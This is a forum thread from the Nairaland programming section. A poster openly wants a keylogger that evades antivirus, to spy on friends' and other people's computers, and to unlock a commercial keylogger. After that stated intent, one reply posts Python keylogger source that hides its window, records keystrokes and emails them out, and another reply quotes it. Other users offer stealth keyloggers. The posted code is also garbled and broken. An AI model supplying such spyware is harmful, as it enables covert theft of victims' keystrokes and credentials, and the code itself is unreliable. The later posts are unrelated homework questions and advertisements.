Welcome, Guest: Register On Nairaland / LOGIN! / Trending / Recent / New
Stats: 3,150,729 members, 7,809,789 topics. Date: Friday, 26 April 2024 at 02:58 PM

Need Programmers Help Please - Programming - Nairaland

Nairaland Forum / Science/Technology / Programming / Need Programmers Help Please (4303 Views)

Pls Programmers Help With Similarities Of Pseudocode & Algorithm / Programmers Help! My Final Project / Programmers help me With This Problem Pls !!!!!!!!!!! (2) (3) (4)

(1) (2) (Reply) (Go Down)

Need Programmers Help Please by Iliasanu: 12:13am On Apr 17, 2015
Programmer please help me to Build Software
Payment is also involved Sir.....

I dowloaded a keylogger software called fk-monitor and i realy lov the software function,but this software was lock wit seria key, i mean most interesting feature of ths soft dose nt work until once purchase and input Seria Key...But i dont hav interest in purchasing d seria kex,wat i want was that : either i edit d soft and remove the locking file Or having my own same kind of Software Sir....
Here is the copy of the software sir....
www.datafilehost.com­/d/30f45b7e

my email : "iliasanu@usa.Com" Or "iliasanu@gmail.Com"
Payment is also involved Sir....

Note sir,
the executable file as already been built,but i wich to edit it and enable sending of data into mail without inputing seria key
Re: Need Programmers Help Please by kudaisi(m): 10:31am On Apr 17, 2015
Do you want to use it on your system or another persons system? I'm asking cause in most cases and Anti Virus will report key logging applications as hostile. Secondly, Is it for a windows or unix enviroment ?
Re: Need Programmers Help Please by kudaisi(m): 11:09am On Apr 17, 2015
Do you have any programming experience ? If I copy and paste the source code for you will you be able to execute it ? I'm thinking it will be easier to develop with python's pywin32 and pyHook for windows.
Re: Need Programmers Help Please by kudaisi(m): 11:28am On Apr 17, 2015
To avoid reinventing the wheel I decided to do some googling for you and here a some Top free keyloggers (although the have commercial version too) I came across. The caveat however is that they all windows based. So if don't have problem with that then you can go ahead and download them.

- REFOG http://www.refog.com/free-keylogger/key-logger.html
- Revealer Keylogger Free Edition http://www.logixoft.com/revealer-keylogger-free-edition.html
- Super free keylogger http://www.keyloggerdownloads.com/super-free-keylogger.html
- Actual Keylogger http://www.actualkeylogger.com/
Re: Need Programmers Help Please by Iliasanu: 7:12pm On Apr 17, 2015
@Kudaisi....
Sir i want to use d software on my friend computers(others people system)
Re: Need Programmers Help Please by Iliasanu: 7:25pm On Apr 17, 2015
Programmer #Kudaisi....
I realy appreciate ur effort 4 me sir....
But wat i want is that :
i wich to av personal remote keyloger wich cn't be detect by almost top antivirus..(e.g..Spy tech/spy agent keyloger)
Or
if i get any live/forever keyloger,which cn upload result into my mail or ftp,and that wuld nt be detect by Antivirus...

sir....
I dont knw much about programming lang,but am using google daily by daily which raize meup little about programming...
And am fuly ready to folw ur Instrution
Re: Need Programmers Help Please by kudaisi(m): 10:26am On Apr 20, 2015
Which programming language are you most comfortable with ? So i can decide on which language to guide you with. NOTE: It has to be within the following languages as they are the ones I am most comfortable with...C#, Java, Python and C++. I've worked on something like this before in python so it will just be a matter of modifying the code.

1 Like 1 Share

Re: Need Programmers Help Please by trendymart(m): 12:27pm On Apr 20, 2015
@kudaisi and co,i must commend you and some guru we have here for always having time to provide useful solutions to peoples problems as they come up on this forum..you are one of the reasons the forum has occupy a regular space in my schedule.

Pls,I want to invite you to act as a consultant for my startup. It comes with reasonable perks anyway but i need you honestly as a critic to my project which is still under construction.
pls i will be waiting for your feedback...thanks
Re: Need Programmers Help Please by ijeezlux(m): 4:05pm On Apr 20, 2015
kudaisi:
Which programming language are you most comfortable with ? So i can decide on which language to guide you with. NOTE: It has to be within the following languages as they are the ones I am most comfortable with...C#, Java, Python and C++. I've worked on something like this before in python so it will just be a matter of modifying the code.
hello my humble friend, i av bin reading some of ur post on nairaland and i must confess that de have bin very informative. The fact is that am a c++ programmer though am still upcoming. Plz if u dnt mind, can i av ur contact eg phone numb or facebook name. So i can communicate with you more often. Wel my numb is 08036407597 u can cal or send me a whatsapp message if you wish. Thanks
Re: Need Programmers Help Please by Nobody: 11:25pm On Apr 22, 2015
HI friend, already wrote a key-logger app using VB.NET and it works well. Just pm me if you need it.

1 Like

Re: Need Programmers Help Please by Iliasanu: 1:39pm On Apr 24, 2015
@kudaisi ...
Admin ples sir i chose any programin language dat u prefer...Please make hury sir...
Re: Need Programmers Help Please by Iliasanu: 1:41pm On Apr 24, 2015
AdmiralDRU...@
if it sorport mailing log,share the download link then...
Re: Need Programmers Help Please by kudaisi(m): 3:20pm On Apr 27, 2015
Iliasanu:
AdmiralDRU...@
import win32api
import win32console
import win32gui
import pythoncom,pyHook
import smtplib
from email.mime.text import MIMEtext

win=win32console.GetConsoleWindow()
win32gui.ShowWindow(win,0)

sender ="me@domain.com"
reciever= "you@domain.com"

def OnKeyboardEvent(event):
if event.Ascii==5:
_exit(1)
if event.Ascii !=0 or 8:
#open output.txt to read current keystrokes
f=open('c:\output.txt','r+')
buffer=f.read()
f.close()
#open output.txt to write current + new keystrokes
f=open('c:\output.txt','w')
keylogs=chr(event.Ascii)
if event.Ascii==13:
keylogs='/n'
buffer+=keylogs
# Put the new buffer as mail content and
#send the output file as text
try:
msg=MIMEtext.(buffer)
s = smtplib.SMTP('localhost')
s.sendemail(sender, reciever, msg.as_string())
s.quit
print "Email succesfully set"
except SMTPException:
print "Error: unable to send email, check your internet connection"
f.write(buffer)
f.close()
# create a hook manager object
hm=pyHook.HookManager()
hm.KeyDown=OnKeyboardEvent
# set the hook
hm.HookKeyboard()
# wait forever
pythoncom.PumpMessages()

Sorry for the delay, the above code should work on a windows PC. Happy coding!! I recommend you install the imported libraries with easy_install if you get errors Importing them as they are not installed by default. One more thing the code is in Python programming language and the spacings are important to successfully run the code.
Re: Need Programmers Help Please by Nobody: 9:57pm On Apr 27, 2015
Iliasanu:
AdmiralDRU...@

I wrote the app myself and it also supports mailing although i just need two things i.e the email and the password. i know you wouldn't give me your user name and password so what i would advise you to do is to open a new gmail or outlook account other than the one you are using right now and send them to me. Then i will configure it from the source code to send it to that email. You can also contact me on facebook, "oruns dru" so we can speak directly.
Re: Need Programmers Help Please by AjaniDWickedBoy(m): 2:38pm On Apr 28, 2015
grin yhu quys r0cks yhu are all really inspiring...kudos to u all
Re: Need Programmers Help Please by Krestkross: 2:31pm On May 12, 2015
kudaisi:
Do you want to use it on your system or another persons system? I'm asking cause in most cases and Anti Virus will report key logging applications as hostile. Secondly, Is it for a windows or unix enviroment ?
. Pls sir I need you help, should I say mentorship? Yes exactly. Pls can you drop you number, email perhaps, drop something, anything I can use to contact you directly.
Re: Need Programmers Help Please by CodeHouse: 12:17pm On May 13, 2015
@OP If this has not been solved yet, Check my signature for my contact. I just saw this and I have coded a stealth keylogger but I hope your intention is not for fraudulent act cos I will only sell based on T&C.

Note:Validity Period: 1 year or could be unlimited
Re: Need Programmers Help Please by CodeHouse: 12:25pm On May 13, 2015
kudaisi:
import win32api
import win32console
import win32gui
import pythoncom,pyHook
import smtplib
from email.mime.text import MIMEtext

win=win32console.GetConsoleWindow()
win32gui.ShowWindow(win,0)

sender ="me@domain.com"
reciever= "you@domain.com"

def OnKeyboardEvent(event):
if event.Ascii==5:
_exit(1)
if event.Ascii !=0 or 8:
#open output.txt to read current keystrokes
f=open('c:\output.txt','r+')
buffer=f.read()
f.close()
#open output.txt to write current + new keystrokes
f=open('c:\output.txt','w')
keylogs=chr(event.Ascii)
if event.Ascii==13:
keylogs='/n'
buffer+=keylogs
# Put the new buffer as mail content and
#send the output file as text
try:
msg=MIMEtext.(buffer)
s = smtplib.SMTP('localhost')
s.sendemail(sender, reciever, msg.as_string())
s.quit
print "Email succesfully set"
except SMTPException:
print "Error: unable to send email, check your internet connection"
f.write(buffer)
f.close()
# create a hook manager object
hm=pyHook.HookManager()
hm.KeyDown=OnKeyboardEvent
# set the hook
hm.HookKeyboard()
# wait forever
pythoncom.PumpMessages()

Sorry for the delay, the above code should work on a windows PC. Happy coding!! I recommend you install the imported libraries with easy_install if you get errors Importing them as they are not installed by default. One more thing the code is in Python programming language and the spacings are important to successfully run the code.

My kind of style:Brief
Re: Need Programmers Help Please by happylala5(m): 3:45pm On May 14, 2015
Please guys I have a presentation in my school to do on Monday and I am so blessed seeing this thread I really need your helps please. I just need your point of view in my question thank you and may God bless you all. Amen.

MY QUESTION.....

Alice and john are a team coding a difficult and sizable program in java. They have some experience with the language, but will have to learn a significant amount "on the fly". They have estimated that the program would take two months as the expected and and four months as the pessimistic estimate. You are their project manager and must develop a contract for completion with the client for the code development. How much time should you allow in the contract for this delivery?
Re: Need Programmers Help Please by ziiiiiiy: 11:28pm On May 16, 2015
the sales manager of a big supermarket in Nigeria desires 2 increase the sales of the supermarket by giving incentives to the marketers. A 7% commission is given to sales reps with sales above #50000 and a commission of 5% for sales below #50000 .design a VB application to implement the policy. I need a code on VB .net/6.0 please
Re: Need Programmers Help Please by CodeHouse: 10:50am On May 17, 2015
ziiiiiiy:
the sales manager of a big supermarket in Nigeria desires 2 increase the sales of the supermarket by giving incentives to the marketers. A 7% commission is given to sales reps with sales above #50000 and a commission of 5% for sales below #50000 .design a VB application to implement the policy. I need a code on VB .net/6.0 please

If you are working on an application for the company then you should know a simple If...Then...execute will solve it

2 Likes

Re: Need Programmers Help Please by ziiiiiiy: 3:22pm On May 17, 2015
OK thanks
Re: Need Programmers Help Please by Viruses: 3:44pm On May 17, 2015
ziiiiiiy:
can u convert to vb.net if I write it in C#? I should have been able to convert it but I'm typing from mobile? Or better still later?
Re: Need Programmers Help Please by IIHTLAG: 5:50pm On May 18, 2015
Good day wonderful People. IIHT welcomes you to another interesting seminar. It's going to be interactive, educating and a critical study, thought, and reflection about the society and how IT can help better it. Don't miss this chance. VENUE: 77 Ojuelegba Rd, Ojuelegba bus stop (Opp Access Bank) TIME: 4pm on the 22nd of May 2015. Call these numbers for seat reservations: 01-3427425, 09021849688, 080143307280 Come with a friend that you love. Visit www.iiht.ng for more info.

Re: Need Programmers Help Please by dupree: 6:09am On May 19, 2015
if u can write the codes with c# then vb.net shouldn't be a problem..
with an IF ELSE statement or SELECT CASE construct , your task is completed
Re: Need Programmers Help Please by ziiiiiiy: 6:35pm On May 19, 2015
I can .........@ viruse
Re: Need Programmers Help Please by Nobody: 8:07pm On May 19, 2015
There is a website that thrills the minds of Scientists, Engineers and Mathematicians in the whole world.

NICKZOM ----- THE WORLD OF CALCULATIONS!

www.nickzom.com is the website for you all to visit and enjoy when it comes to solving all your calculation problems.

It solves problems for you with a step by step approach in Mathematics, Physics, Engineering and Switches/Converters and a lot more to come.

Mathematics contains a lot of contents you can view them at www.nickzom.com/calcworldmaths.html

Physics also at www.nickzom.com/calcworldphysics.html

Engineering at www.nickzom.com/calcworldengine.html

Switches/Converters at www.nickzom.com/calcworldswitches.html

NICKZOM - WORLD OF CALCULATIONS SHOWS A STEP BY STEP APPROACH IN PROVIDING THE SOLUTION TO ANY OF YOUR PROBLEMS.

I promise you that you are getting to know the NUMBER ONE online calculation web application software in the WHOLE WORLD.

Please Share This To Your Friends!!!

(1) (2) (Reply)

Naira Music - Nigerian Music App / Hello PHP Dev, If You're To Dump PHP What Language Will You Adopt? / Web Development Isn't Lucrative Anymore.

(Go Up)

Sections: politics (1) business autos (1) jobs (1) career education (1) romance computers phones travel sports fashion health
religion celebs tv-movies music-radio literature webmasters programming techmarket

Links: (1) (2) (3) (4) (5) (6) (7) (8) (9) (10)

Nairaland - Copyright © 2005 - 2024 Oluwaseun Osewa. All rights reserved. See How To Advertise. 56
Disclaimer: Every Nairaland member is solely responsible for anything that he/she posts or uploads on Nairaland.